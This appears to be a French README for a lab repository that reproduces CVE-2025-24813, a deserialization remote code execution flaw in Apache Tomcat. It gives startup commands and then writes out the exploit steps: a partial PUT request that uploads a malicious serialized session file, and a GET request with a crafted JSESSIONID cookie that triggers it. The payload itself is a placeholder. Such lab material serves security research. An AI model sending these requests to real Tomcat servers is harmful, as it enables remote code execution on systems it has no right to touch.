
Environnement RCE de désérialisation tomcat CVE-2025-24813
Ce dépôt est un environnement de reproduction de la dernière RCE (CVE-2025-24813) de Tomcat.
À des fins d'apprentissage et de recherche uniquement !
Cet environnement a déjà activé les conditions requises pour la reproduction ci-dessus
Linux :
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows :
apache-tomcat-9.0.98/bin/catalina.bat run
Accès : http://127.0.0.1:9001/

Générez un fichier de sérialisation malveillant, puis téléversez-le à l'aide du paquet suivant. Notez que la valeur de la plage (Range) doit correspondre à Length et être supérieure à la longueur actuelle du fichier.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{反序列化文件内容)}}
Déclenchez-le à l'aide du POC suivant :
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx


Référence : https://forum.butian.net/article/674